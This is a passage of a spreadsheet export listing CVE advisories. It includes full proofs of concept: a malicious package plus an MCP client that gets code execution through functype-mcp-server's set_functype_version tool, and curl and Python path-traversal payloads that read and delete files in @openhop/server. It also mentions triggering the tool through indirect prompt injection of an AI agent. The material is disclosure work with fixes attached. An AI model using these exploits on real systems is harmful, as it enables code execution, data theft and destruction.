  const spec = `functype@${args.version}`
  try {
    execFileSync("pnpm", ["add", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
```
`args.version` is interpolated into the package specifier string and passed directly to `pnpm add`. Supplying `file:/path/to/evil` causes pnpm to install an attacker-controlled directory as the `functype` package alias.
**Sink 2 — dynamic import executes installed package code:**
```ts
// packages/mcp-server/src/lib/docs/data.ts:23-30
if (force) {
  const resolvedPath = require.resolve("functype/cli")
  cli = await import(`${pathToFileURL(resolvedPath).href}?t=${Date.now()}`)
}
```
`initDocsData(true)` is called immediately after installation (line 134 in `index.ts`). It resolves `functype/cli` from the node_modules that now points to the attacker's package and dynamically imports it, executing any module-level code in the attacker's `cli.js` at import time.
**Data flow summary:**
1. `index.ts:115` — MCP tool `set_functype_version` registered, no auth required.
2. `index.ts:119-121` — `version` accepted as raw `z.string()` (source).
3. `index.ts:123` — `functype@${args.version}` constructed without sanitization.
4. `index.ts:125` — `execFileSync("pnpm", ["add", spec], ...)` installs attacker-controlled package (sink: arbitrary install).
5. `index.ts:134` — `initDocsData(true)` called immediately.
6. `data.ts:29-30` — `require.resolve("functype/cli")` + dynamic `import()` executes attacker module (sink: RCE).
### PoC
**Step 1 — Prepare the attacker-controlled evil package:**
```bash
mkdir -p /tmp/evil
cat &gt; /tmp/evil/package.json &lt;&lt;'EOF'
{"name":"evil-functype","version":"1.0.0","type":"module","exports":{"./cli":"./cli.js"}}
EOF
cat &gt; /tmp/evil/cli.js &lt;&lt;'EOF'
import { writeFileSync } from "node:fs";
writeFileSync("/pwned.txt", "RCE: mcp import-time code execution via set_functype_version\n");
export const TYPES = {};
export const INTERFACES = {};
export const CATEGORIES = {};
export const FULL_INTERFACES = {};
export const VERSION = "1.0.0";
EOF
```
**Step 2 — Clone and build the victim monorepo at the affected version:**
```bash
TMP="$(mktemp -d)"
git clone https://github.com/jordanburke/functype.git "$TMP/functype"
cd "$TMP/functype"
git checkout v1.4.3
corepack enable
pnpm install --frozen-lockfile
pnpm -F functype build
pnpm -F functype-mcp-server build
```
**Step 3 — Set up an MCP client to deliver the exploit:**
```bash
cd "$TMP"
npm init -y
npm pkg set type=module
npm install @modelcontextprotocol/sdk
cat &gt; exploit.mjs &lt;&lt;'EOF'
import { Client } from "@modelcontextprotocol/sdk/client/index.js";
import { StdioClientTransport } from "@modelcontextprotocol/sdk/client/stdio.js";
const client = new Client({ name: "poc", version: "1.0.0" });
const transport = new StdioClientTransport({
  command: "node",
  args: [`${process.env.REPO}/packages/mcp-server/dist/bin.js`],
  env: { ...process.env, TRANSPORT_TYPE: "stdio" },
});
await client.connect(transport);
const result = await client.callTool({
  name: "set_functype_version",
  arguments: { version: "file:/tmp/evil" },
});
console.log(result);
await client.close();
EOF
REPO="$TMP/functype" node exploit.mjs
```
**Step 4 — Verify arbitrary code execution:**
```bash
cat /pwned.txt
# Expected output: RCE: mcp import-time code execution via set_functype_version
```
**Dynamic reproduction (Docker):**
The Phase 2 dynamic test used the provided Dockerfile which automates the above steps inside a container. The container confirmed creation of `/pwned.txt` with the expected payload string, proving end-to-end RCE.
```
[poc] EXPLOIT SUCCEEDED: /pwned.txt exists
[poc] File contents: RCE: mcp import-time code execution via set_functype_version
[evil-payload] Arbitrary code executed via functype/cli dynamic import
```
**Recommended remediation:**
```diff
+const SAFE_FUNCTYPE_VERSION = /^(?:latest|next|beta|alpha|canary|rc|[~^]?v?\d+(?:\.\d+){0,2}(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?)$/
+
+const isSafeFunctypeVersion = (version: string): boolean =&gt; {
+  const trimmed = version.trim()
+  return trimmed === version &amp;&amp; SAFE_FUNCTYPE_VERSION.test(trimmed) &amp;&amp; !/[/:\\@]/.test(trimmed)
+}
 execute: async (args) =&gt; {
-  const spec = `functype@${args.version}`
+  if (!isSafeFunctypeVersion(args.version)) {
+    return "Invalid functype version. Use a semver version, range prefix (^ or ~), or a known dist-tag."
+  }
+  const spec = `functype@${args.version}`
   try {
-    execFileSync("pnpm", ["add", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
+    execFileSync("pnpm", ["add", "--ignore-scripts", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
```
### Impact
This is a **Remote Code Execution (RCE)** vulnerability. Any MCP client that can invoke the `set_functype_version` tool — which requires no authentication and is enabled by default in the stdio MCP server — can execute arbitrary JavaScript in the MCP server process.
**Who is impacted:**
- Developers and teams running `functype-mcp-server` (version 1.4.3) in their local or CI environments as an AI coding assistant integration.
- Users whose AI assistant (LLM agent) is connected to this MCP server and is susceptible to indirect prompt injection: a malicious document or web page read by the AI could trigger a `set_functype_version` call with a `file:` or `npm:` alias payload.
- In non-default `TRANSPORT_TYPE=httpStream` deployments, network-accessible attackers can exploit this without local access.
The full impact at exploitation is confidentiality, integrity, and availability — an attacker can read secrets from the process environment, modify files, or crash the server.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# Dockerfile for VULN-001: MCP set_functype_version Package Alias RCE
#
# Build context: reports/npmAI_684_jordanburke__functype/
#   COPY repo/       -&gt; /workspace/functype/   (victim monorepo)
#   COPY vuln-001/   -&gt; supporting PoC files
#
# Build:  docker build -t vuln001-functype-rce -f vuln-001/Dockerfile .
# Run:    docker run --rm vuln001-functype-rce
#
# Expected exit 0 with "[poc] EXPLOIT SUCCEEDED" in output.
FROM node:24-slim
# Install pnpm matching the repo's packageManager field (pnpm@11.7.0).
RUN npm install -g pnpm@11.7.0 --quiet
# ── Victim workspace ──────────────────────────────────────────────────────────
WORKDIR /workspace/functype
COPY repo/ ./
# Install all workspace deps. --no-frozen-lockfile avoids hash mismatches
# caused by running on a different pnpm minor than the one that generated the
# lockfile; the installed versions are still constrained by the lockfile
# specifiers for the packages we care about.
RUN pnpm install --no-frozen-lockfile
# Build functype first (mcp-server externals functype at build time).
RUN pnpm -F functype build
# Build the MCP server binary (output: packages/mcp-server/dist/bin.js).
RUN pnpm -F functype-mcp-server build
# ── Attacker-controlled evil package ─────────────────────────────────────────
# /evil/cli.js writes /pwned.txt when dynamically imported.
COPY vuln-001/evil/ /evil/
# ── MCP exploit client ────────────────────────────────────────────────────────
WORKDIR /client
RUN npm init -y --quiet &amp;&amp; \
    npm pkg set type=module &amp;&amp; \
    npm install @modelcontextprotocol/sdk@1.29.0 --quiet
COPY vuln-001/client/exploit.mjs ./exploit.mjs
# Default entrypoint: run the exploit and exit 0 on success.
CMD ["node", "/client/exploit.mjs"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
PoC driver for VULN-001: MCP set_functype_version Package Alias RCE
via Unsanitized pnpm install + Dynamic Import (CWE-829, CVSS 7.8 High).
Attack chain:
  1. Attacker calls MCP tool set_functype_version with version="file:/evil"
  2. Server executes: execFileSync("pnpm", ["add", "functype@file:/evil"], ...)
  3. Evil package is installed as the functype alias in mcp-server's node_modules
  4. Server calls initDocsData(true) which resolves functype/cli and dynamic-imports it
  5. /evil/cli.js runs at import time -&gt; writes /pwned.txt (arbitrary code execution)
Usage:
  python3 poc.py [--build-only]
Requirements:
  - Docker daemon running
  - Build context at parent directory of this file's directory
"""
import subprocess
import sys
import json
import os
import argparse
VULN_DIR = os.path.dirname(os.path.abspath(__file__))
REPORT_DIR = os.path.dirname(VULN_DIR)
IMAGE_NAME = "vuln001-functype-rce"
DOCKERFILE = os.path.join(VULN_DIR, "Dockerfile")
RESULT_FILE = os.path.join(VULN_DIR, "phase2_result.json")
BUILD_CMD = ["docker", "build", "-t", IMAGE_NAME, "-f", DOCKERFILE, REPORT_DIR]
RUN_CMD = ["docker", "run", "--rm", IMAGE_NAME]
def run(cmd, timeout=None, **kwargs):
    """Run a command and return CompletedProcess with combined output."""
    return subprocess.run(
        cmd,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        text=True,
        timeout=timeout,
        **kwargs,
    )
def write_result(passed, verdict, reason, evidence):
    result = {
        "passed": passed,
        "verdict": verdict,
        "reason": reason,
        "build_command": " ".join(BUILD_CMD),
        "run_command": " ".join(RUN_CMD),
        "poc_command": f"python3 {os.path.basename(__file__)}",
        "evidence": evidence,
        "artifacts": ["Dockerfile", "poc.py", "evil/package.json", "evil/cli.js", "client/exploit.mjs"],
    }
    with open(RESULT_FILE, "w", encoding="utf-8") as f:
        json.dump(result, f, indent=2, ensure_ascii=False)
    print(f"[poc] Result written to {RESULT_FILE}")
    print(f"[poc] verdict={verdict}  passed={passed}")
def main():
    parser = argparse.ArgumentParser(description="VULN-001 PoC driver")
    parser.add_argument("--build-only", action="store_true", help="Only build the image, do not run")
    args = parser.parse_args()
    # ── Build ─────────────────────────────────────────────────────────────────
    print("[poc] Building Docker image (this may take a few minutes)...")
    print(f"[poc] Build command: {' '.join(BUILD_CMD)}")
    try:
        build = run(BUILD_CMD, timeout=900)
    except subprocess.TimeoutExpired:
        msg = "Docker build timed out after 900 seconds"
        print(f"[poc] ERROR: {msg}")
        write_result(False, "INCOMPLETE", f"빌드 타임아웃: {msg}", msg)
        sys.exit(2)
    if build.returncode != 0:
        tail = (build.stdout + "\n" + build.stderr)[-3000:]
        print("[poc] Build FAILED:")
        print(tail)
        write_result(
            False,
            "FAIL",
            "Docker 이미지 빌드 실패. pnpm install 또는 TypeScript 빌드 오류 확인 필요.",
            f"BUILD EXIT {build.returncode}\n{tail}",
        )
        sys.exit(1)
    print("[poc] Build succeeded.")
    if args.build_only:
        print("[poc] --build-only flag set; skipping run.")
        sys.exit(0)
    # ── Run ───────────────────────────────────────────────────────────────────
    print(f"[poc] Running exploit container: {' '.join(RUN_CMD)}")
    try:
        run_result = run(RUN_CMD, timeout=180)
    except subprocess.TimeoutExpired:
        msg = "Container run timed out after 180 seconds"
        print(f"[poc] ERROR: {msg}")
        write_result(False, "INCOMPLETE", f"컨테이너 실행 타임아웃: {msg}", msg)
        sys.exit(2)
    stdout = run_result.stdout or ""
    stderr = run_result.stderr or ""
    combined = stdout + "\n" + stderr
    print("=" * 60)
    print("STDOUT:")
    print(stdout)
    print("STDERR:")
    print(stderr)
    print(f"EXIT CODE: {run_result.returncode}")
    print("=" * 60)
    # Success criteria: exit 0 AND exploit succeeded message present
    exploit_succeeded = "EXPLOIT SUCCEEDED" in combined
    passed = run_result.returncode == 0 and exploit_succeeded
    if passed:
        # Extract key evidence lines
        evidence_lines = [
            line for line in combined.splitlines()
            if any(kw in line for kw in ("EXPLOIT SUCCEEDED", "pwned.txt", "evil-payload", "RCE:"))
        ]
        evidence = "\n".join(evidence_lines) if evidence_lines else combined[-1000:]
        write_result(
            True,
            "PASS",
            (
                "컨테이너 내 /pwned.txt 생성 확인: MCP set_functype_version 도구에 "
                'version="file:/evil" 인수를 전달하자 서버가 pnpm add functype@file:/evil을 실행한 후 '
                "initDocsData(true)가 동적 import를 통해 evil/cli.js를 실행, 임의 파일 쓰기(RCE)가 발생함."
            ),
            evidence,
        )
        print("[poc] === PASS: exploit reproduced ===")
        sys.exit(0)
    else:
        # Distinguish failure modes
        if not exploit_succeeded and run_result.returncode == 0:
            verdict = "INCOMPLETE"
            reason = (
                "/pwned.txt가 생성되지 않았으나 컨테이너는 정상 종료됨. "
                "pnpm add 후 require.resolve 경로 확인 필요 — pnpm 가상 스토어 구조로 인해 "
                "node_modules/functype 심볼릭링크가 예상 위치에 없을 수 있음."
            )
        else:
            verdict = "FAIL"
            reason = (
                f"컨테이너 종료 코드 {run_result.returncode}. "
                "exploit.mjs 오류 또는 MCP 서버 시작 실패. 로그 확인 필요."
            )
        write_result(False, verdict, reason, combined[-2000:])
        print(f"[poc] === {verdict}: exploit did not reproduce ===")
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="S1292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59176</t>
        </is>
      </c>
    </row>
    <row r="1293">
      <c r="A1293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1293" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59177</t>
        </is>
      </c>
      <c r="D1293" s="5" t="inlineStr"/>
      <c r="E1293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1293" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1293" s="5" t="inlineStr"/>
      <c r="H1293" s="5" t="inlineStr"/>
      <c r="I1293" s="5" t="inlineStr"/>
      <c r="J1293" s="5" t="inlineStr"/>
      <c r="K1293" s="5" t="inlineStr"/>
      <c r="L1293" s="5" t="inlineStr">
        <is>
          <t>pip:esphome-device-builder</t>
        </is>
      </c>
      <c r="M1293" s="5" t="inlineStr">
        <is>
          <t>1.0.10</t>
        </is>
      </c>
      <c r="N1293" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1293" s="5" t="inlineStr"/>
      <c r="P1293" s="5" t="inlineStr"/>
      <c r="Q1293" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="R1293"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S1293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59177</t>
        </is>
      </c>
    </row>
    <row r="1294">
      <c r="A1294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1294" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59179</t>
        </is>
      </c>
      <c r="D1294" s="5" t="inlineStr"/>
      <c r="E1294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1294" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1294" s="5" t="inlineStr"/>
      <c r="H1294" s="5" t="inlineStr"/>
      <c r="I1294" s="5" t="inlineStr"/>
      <c r="J1294" s="5" t="inlineStr"/>
      <c r="K1294" s="5" t="inlineStr"/>
      <c r="L1294" s="5" t="inlineStr">
        <is>
          <t>npm:@openhop/server</t>
        </is>
      </c>
      <c r="M1294" s="5" t="inlineStr">
        <is>
          <t>0.3.6</t>
        </is>
      </c>
      <c r="N1294" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1294" s="5" t="inlineStr"/>
      <c r="P1294" s="5" t="inlineStr"/>
      <c r="Q1294" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1294" s="5" t="inlineStr">
        <is>
          <t>## Path Traversal in Flow ID File Operations
### Summary
`@openhop/server` passes unsanitized HTTP route parameters directly to `path.join()` when constructing filesystem paths for flow YAML files. An unauthenticated attacker who can reach the server can read arbitrary `.yaml` files accessible to the OpenHop process outside the configured flow directory, and can delete arbitrary `.yaml` files at any path reachable by the process. Because CORS is set to `origin: true` (allow all origins), a victim's browser can be used to exploit the vulnerability against a loopback-bound instance. Docker deployments bind `HOST=0.0.0.0` by default, enabling direct remote exploitation. CVSS Base Score: **8.3 (High)**.
### Details
`FlowStore.filePath()` in `packages/server/src/store.ts:52–53` constructs a filesystem path by concatenating the caller-supplied `id` directly into `path.join`:
```ts
// packages/server/src/store.ts:52-53
private filePath(id: string): string {
  return join(this.dir, `${id}.yaml`)
}
```
This result is consumed by two sinks:
- **Read** (`packages/server/src/store.ts:78`): `readFile(this.filePath(id), 'utf-8')`
- **Delete** (`packages/server/src/store.ts:105`): `unlink(this.filePath(id))`
The `id` value originates from unauthenticated Fastify HTTP route parameters:
- `GET /api/flows/:id` (`packages/server/src/routes.ts:306`) → `store.get(id)` at line 333–335
- `DELETE /api/flows/:id` (`packages/server/src/routes.ts:509`) → `store.delete(id)` at line 539–541
The route parameter schema at `packages/server/src/routes.ts:315` and `519` declares only `type: 'string'` with no pattern constraint or allowlist. Fastify's underlying router (`find-my-way`) applies `decodeURIComponent` to route parameters, so the URL segment `..%2Fvictim` is decoded to `../victim` before it reaches application code. Node.js `path.join('/data/flows', '../victim.yaml')` then normalizes to `/data/victim.yaml`, escaping the configured data directory.
Additionally, `packages/server/src/index.ts:37` registers CORS with `origin: true`, permitting any browser origin to make cross-origin requests to the server. This makes the vulnerability exploitable via a malicious webpage against users running OpenHop locally.
**Full data-flow (read path):**
1. HTTP `GET /api/flows/..%2Fvictim` received (`routes.ts:306`)
2. `find-my-way` decodes `..%2Fvictim` → `req.params.id = '../victim'` (`routes.ts:333`)
3. `store.get('../victim')` → `filePath('../victim')` → `join('/data/flows', '../victim.yaml')` → `/data/victim.yaml` (`store.ts:52–53`)
4. `readFile('/data/victim.yaml', 'utf-8')` returns file contents (`store.ts:78`)
5. Server responds HTTP 200 with YAML-parsed JSON body
**Full data-flow (delete path):**
1. HTTP `DELETE /api/flows/..%2Fdelete-me` received (`routes.ts:509`)
2. `find-my-way` decodes `..%2Fdelete-me` → `req.params.id = '../delete-me'` (`routes.ts:539`)
3. `store.delete('../delete-me')` → `filePath('../delete-me')` → `join('/data/flows', '../delete-me.yaml')` → `/data/delete-me.yaml` (`store.ts:52–53`)
4. `unlink('/data/delete-me.yaml')` removes the file (`store.ts:105`)
5. Server responds HTTP 204
### PoC
**Environment setup (Docker):**
```bash
# Build from repository root
docker build -f vuln-001/Dockerfile -t openhop-vuln-001 .
# Run with HOST=0.0.0.0 (default in the Dockerfile ENV)
docker run -d --name openhop-vuln-001 -p 8799:8799 openhop-vuln-001
```
The container creates `/data/flows/` as the configured flow store (`OPENHOP_DATA_DIR=/data/flows`) and places `/data/victim.yaml` and `/data/delete-me.yaml` outside that directory as traversal targets.
**Attack 1 — Read file outside flow store:**
```bash
curl -i --path-as-is 'http://127.0.0.1:8799/api/flows/..%2Fvictim'
```
Expected response:
```http
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
{"id":"victim","meta":{"title":"SECRET_OUTSIDE_FILE","description":"This file lives outside the configured flow store directory"},"flow":{"nodes":[{"id":"a","label":"Sensitive Data","type":"service"}]},"version":1,"createdAt":"2026-06-20T00:00:00.000Z","updatedAt":"2026-06-20T00:00:00.000Z"}
```
**Attack 2 — Delete file outside flow store:**
```bash
curl -i -X DELETE --path-as-is 'http://127.0.0.1:8799/api/flows/..%2Fdelete-me'
```
Expected response:
```http
HTTP/1.1 204 No Content
```
Verify deletion:
```bash
docker exec openhop-vuln-001 sh -c 'test -e /data/delete-me.yaml &amp;&amp; echo exists || echo deleted'
# Output: deleted
```
**Automated PoC script:**
```bash
python3 poc.py 127.0.0.1 8799
```
**Recommended fix:**
```diff
--- a/packages/server/src/store.ts
+++ b/packages/server/src/store.ts
+const FLOW_ID_PATTERN = /^[A-Za-z0-9_-]+$/
+
   private filePath(id: string): string {
+    if (!FLOW_ID_PATTERN.test(id)) {
+      throw new Error('Invalid flow id')
+    }
     return join(this.dir, `${id}.yaml`)
   }
```
### Impact
This is a **Path Traversal (CWE-22)** vulnerability. The `.yaml` file extension restriction limits confidentiality impact to YAML-format files (C:L), but the delete path allows permanent destruction of any `.yaml` file the process can reach (I:H, A:H).
**Affected parties:**
- **Users running `openhop serve` locally** — exploitable via a malicious webpage due to `cors({ origin: true })` allowing all browser origins to make cross-origin requests to `localhost:8799`.
- **Docker/server deployments** — `HOST=0.0.0.0` is set by default in the official Docker environment, making all three routes directly reachable from the network without authentication.
An attacker can: (1) read the contents of any `.yaml` file accessible to the OpenHop process, potentially leaking application secrets, configuration data, or other YAML-serialized data; (2) permanently delete any `.yaml` file accessible to the process, causing data loss or disruption of services that depend on those files.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# Dockerfile for VULN-001: Path Traversal in OpenHop Flow ID File Operations (CWE-22)
#
# Build context: the repository root (naorsabag/openhop)
# Usage:
#   docker build -f vuln-001/Dockerfile -t openhop-vuln-001 .
#   docker run -d --name openhop-vuln-001 -p 8799:8799 openhop-vuln-001
#
# Data layout inside the container:
#   /data/flows/         &lt;- OPENHOP_DATA_DIR (the configured flow store)
#   /data/victim.yaml    &lt;- OUTSIDE the flow store (path traversal read target)
#   /data/delete-me.yaml &lt;- OUTSIDE the flow store (path traversal delete target)
#
# The exploit payload "..%2Fvictim" is URL-decoded by find-my-way to "../victim",
# so path.join('/data/flows', '../victim.yaml') resolves to /data/victim.yaml.
FROM node:22-alpine
WORKDIR /app
# Copy package manifests so npm can resolve workspace dependency graph.
COPY package*.json ./
COPY packages/server/package*.json packages/server/
COPY packages/shared/package*.json packages/shared/
COPY packages/cli/package*.json packages/cli/
COPY packages/web/package*.json packages/web/
# Copy TypeScript configs and source files BEFORE npm install.
# The @openhop/server package has a "prepare" lifecycle that runs
# `tsc &amp;&amp; esbuild` during npm install, so all sources must be present.
COPY tsconfig.base.json ./
COPY packages/server/tsconfig*.json packages/server/
COPY packages/server/src/ packages/server/src/
COPY packages/shared/src/ packages/shared/src/
# Install all workspace dependencies.
# The @openhop/server prepare script will compile to dist/server.js.
# We run the server via tsx (direct TypeScript), so the compiled output
# is not required at runtime but the prepare step must not fail.
RUN npm install
# Set up the data directory layout for the PoC.
#   /data/flows/       -&gt; configured as OPENHOP_DATA_DIR (the "safe" directory)
#   /data/victim.yaml  -&gt; outside the store; represents a sensitive file that
#                         MUST NOT be reachable via the API without sanitization
RUN mkdir -p /data/flows &amp;&amp; \
    printf 'id: victim\nversion: 1\ncreatedAt: "2026-06-20T00:00:00.000Z"\nupdatedAt: "2026-06-20T00:00:00.000Z"\nroot:\n  meta:\n    title: SECRET_OUTSIDE_FILE\n    description: This file lives outside the configured flow store directory\n  flow:\n    nodes:\n      - id: a\n        label: Sensitive Data\n' \
    &gt; /data/victim.yaml &amp;&amp; \
    printf 'id: delete-me\nversion: 1\ncreatedAt: "2026-06-20T00:00:00.000Z"\nupdatedAt: "2026-06-20T00:00:00.000Z"\nroot:\n  meta:\n    title: DELETE_TARGET_FILE\n  flow:\n    nodes:\n      - id: b\n        label: Delete Target\n' \
    &gt; /data/delete-me.yaml
# Server listens on 8799 inside the container.
EXPOSE 8799
# OPENHOP_DATA_DIR constrains the flow store to /data/flows/.
# HOST=0.0.0.0 makes the server reachable from outside the container.
ENV OPENHOP_DATA_DIR=/data/flows
ENV HOST=0.0.0.0
ENV PORT=8799
# Run the server via tsx (TypeScript runner; no compile step needed at runtime).
CMD ["npx", "tsx", "packages/server/src/index.ts"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
PoC: Path Traversal in OpenHop Flow ID File Operations (CWE-22)
Target: @openhop/server 0.3.5 / openhop CLI 0.3.6
VULN-001 — CVSS 8.3 High
Vulnerability:
    FlowStore.filePath(id) at packages/server/src/store.ts:52 performs:
        return join(this.dir, `${id}.yaml`)
    with no sanitization on `id`. The route GET /api/flows/:id passes
    `req.params.id` (decoded by find-my-way via decodeURIComponent) directly
    to store.get(id), which calls filePath(). A payload of "..%2Fvictim" in
    the URL is decoded to "../victim", causing path.join to escape the
    configured data directory.
Attack Vectors:
    READ:   GET    /api/flows/..%2Fvictim    -&gt; reads  /data/victim.yaml
    DELETE: DELETE /api/flows/..%2Fdelete-me -&gt; deletes /data/delete-me.yaml
Both routes are unauthenticated (routes.ts:306, 509).
Usage:
    python3 poc.py [host] [port]
    python3 poc.py 127.0.0.1 8799
"""
import http.client
import json
import sys
import time
HOST = sys.argv[1] if len(sys.argv) &gt; 1 else "127.0.0.1"
PORT = int(sys.argv[2]) if len(sys.argv) &gt; 2 else 8799
# URL-encoded payloads: %2F is a percent-encoded "/" character.
# find-my-way treats ".." and "%2F" together as a single path segment
# (no literal "/" split), then decodes the segment to "../victim".
TRAVERSAL_GET_PATH = "/api/flows/..%2Fvictim"
TRAVERSAL_DELETE_PATH = "/api/flows/..%2Fdelete-me"
def wait_for_server(host: str, port: int, timeout: int = 60) -&gt; bool:
    """Poll until the OpenHop server returns any response on /api/flows."""
    deadline = time.time() + timeout
    print(f"[*] Waiting for server at http://{host}:{port} ...")
    while time.time() &lt; deadline:
        try:
            conn = http.client.HTTPConnection(host, port, timeout=2)
            conn.request("GET", "/api/flows")
            r = conn.getresponse()
            r.read()
            conn.close()
            print(f"[+] Server ready (HTTP {r.status} on /api/flows)")
            return True
        except Exception:
            time.sleep(1)
    return False
def raw_http(method: str, host: str, port: int, path: str):
    """
    Send an HTTP request with the path exactly as given — no normalization.
    http.client does NOT percent-decode or normalize the path string, so
    '..%2F' reaches the server verbatim and Fastify's router decodes it.
    """
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request(method, path)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, body
def main() -&gt; int:
    print("=" * 62)
    print("VULN-001  Path Traversal in OpenHop Flow ID File Operations")
    print("=" * 62)
    print(f"[*] Target  : http://{HOST}:{PORT}")
    print(f"[*] Payload : ..%2F  (decoded by find-my-way to ../)")
    print(f"[*] Store   : /data/flows/   (OPENHOP_DATA_DIR)")
    print(f"[*] Outside : /data/victim.yaml  /data/delete-me.yaml")
    print()
    if not wait_for_server(HOST, PORT):
        print("[-] Server did not become ready within timeout. ABORT.")
        return 1
    print()
    passed_read = False
    passed_delete = False
    # ── Attack 1: Read a file outside the configured flow store ─────────
    print("[*] Attack 1 — READ path traversal")
    print(f"    Request : GET {TRAVERSAL_GET_PATH}")
    print(f"    Decoded : id = ../victim")
    print(f"    Resolves: path.join('/data/flows', '../victim.yaml')")
    print(f"            = /data/victim.yaml  (outside flow store)")
    status, body = raw_http("GET", HOST, PORT, TRAVERSAL_GET_PATH)
    body_text = body.decode("utf-8", errors="replace")
    print(f"    Status  : {status}")
    print(f"    Body    : {body_text[:600]}")
    if status == 200:
        try:
            data = json.loads(body_text)
            title = data.get("meta", {}).get("title", "")
            if "SECRET_OUTSIDE_FILE" in title:
                print("[PASS] READ confirmed: HTTP 200 returned content of /data/victim.yaml")
                print(f"       Leaked title field = {title!r}")
                passed_read = True
            else:
                print(f"[WARN] HTTP 200 but unexpected title: {title!r}")
                print(f"       Full response: {data}")
                # Still count as read-traversal success if we got a valid flow back
                if "meta" in data or "flow" in data:
                    print("[PASS] READ confirmed: path traversal returned a flow from outside store")
                    passed_read = True
        except json.JSONDecodeError:
            print(f"[FAIL] HTTP 200 but response is not JSON: {body_text[:200]}")
    else:
        print(f"[FAIL] Expected HTTP 200, got {status}")
    print()
    # ── Attack 2: Delete a file outside the configured flow store ────────
    print("[*] Attack 2 — DELETE path traversal")
    print(f"    Request : DELETE {TRAVERSAL_DELETE_PATH}")
    print(f"    Decoded : id = ../delete-me")
    print(f"    Resolves: path.join('/data/flows', '../delete-me.yaml')")
    print(f"            = /data/delete-me.yaml  (outside flow store)")
    status, body = raw_http("DELETE", HOST, PORT, TRAVERSAL_DELETE_PATH)
    body_text = body.decode("utf-8", errors="replace")
    print(f"    Status  : {status}")
    if body_text:
        print(f"    Body    : {body_text[:200]}")
    if status in (200, 204):
        print(f"[PASS] DELETE confirmed: HTTP {status} — /data/delete-me.yaml deleted outside store")
        passed_delete = True
    else:
        print(f"[FAIL] Expected HTTP 204, got {status}")
    # ── Summary ─────────────────────────────────────────────────────────
    print()
    print("=" * 62)
    if passed_read and passed_delete:
        print("[RESULT] PASS — Both read and delete path traversal exploited")
        return 0
    elif passed_read:
        print("[RESULT] PARTIAL — Read traversal confirmed, delete did not succeed")
        return 1
    else:
        print("[RESULT] FAIL — Exploit did not succeed")
        return 2
if __name__ == "__main__":
    sys.exit(main())
```</t>
        </is>
      </c>
      <c r="S1294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59179</t>
        </is>
      </c>
    </row>
    <row r="1295">
      <c r="A1295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1295" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59185</t>
        </is>
      </c>
      <c r="D1295" s="5" t="inlineStr"/>
      <c r="E1295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1295" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1295" s="5" t="inlineStr"/>
      <c r="H1295" s="5" t="inlineStr"/>
      <c r="I1295" s="5" t="inlineStr"/>
      <c r="J1295" s="5" t="inlineStr"/>
      <c r="K1295" s="5" t="inlineStr"/>
      <c r="L1295" s="5" t="inlineStr">
        <is>
          <t>go:github.com/identrail/identrail</t>
        </is>
      </c>
      <c r="M1295" s="5" t="inlineStr">
        <is>
          <t>1.0.2</t>
        </is>
      </c>
      <c r="N1295" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1295" s="5" t="inlineStr"/>
      <c r="P1295" s="5" t="inlineStr"/>
      <c r="Q1295" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R1295" s="5" t="inlineStr">
        <is>
          <t>## Summary
identrail's GitHub App connection-completion endpoint binds a fully client-supplied `installation_id` to the caller's workspace without verifying that the installation belongs to, or was installed by, the workspace that initiated the connect flow. identrail then mints a GitHub App installation access token for the supplied `installation_id` using the app's own JWT, so an authenticated tenant can link any other identrail customer's GitHub App installation into their own workspace and read that victim organization's private repositories.
## Affected code (default-on path, no feature flag)
